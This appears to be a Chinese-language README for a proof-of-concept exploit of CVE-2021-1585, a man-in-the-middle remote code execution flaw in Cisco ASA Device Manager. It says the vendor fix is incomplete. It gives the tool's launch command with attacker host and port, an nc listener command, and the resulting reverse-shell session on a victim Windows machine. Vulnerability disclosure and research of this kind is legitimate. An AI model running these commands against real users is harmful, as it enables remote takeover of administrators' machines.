
CVE-2021-1585的概念验证:Cisco ASA Device Manager RCE
staystaystay 是一个针对 CVE-2021-1585 的概念验证漏洞利用程序,该漏洞是影响 Cisco ASA Device Manager (ASDM) 的中间人或恶意端点 RCE 问题。该问题最初由 Malcolm Lashley 发现并在 2021 年夏季披露。然而,在我研究此问题时,最新版本 (ASDM 7.17(1)) 仍未修补,我独立发现了它。
Cisco 在 ASDM 7.18(1.152) 中“修复”了此问题。我之所以说“修复”,是因为此漏洞利用仍然有效。用户只需点击“是”。请观看下面的视频。
攻击者可以配置两种类型的有效载荷来获取受害者的反向 shell:
如果受害者将其 ASDM 连接到 staystaystay,则它会注入配置的有效载荷,产生一个反向 shell。jjs 反向 shell 可以使用典型的 nc 监听器(甚至 Metasploit,如果你愿意)捕获。Longtime Sunshine 选项要求攻击者使用该框架。
例如,以下命令将使用 jjs 有效载荷在 8443 端口上启动 staystaystay:
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
一旦受害者连接到 8443,将生成一个到 10.0.0.2:1270 的反向 shell:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
以下视频包含使用 Longtime Sunshine 进行漏洞利用的示例:
以下视频演示了针对已修补版本的攻击:
可以在以下位置找到 AttackerKB 的分析文章: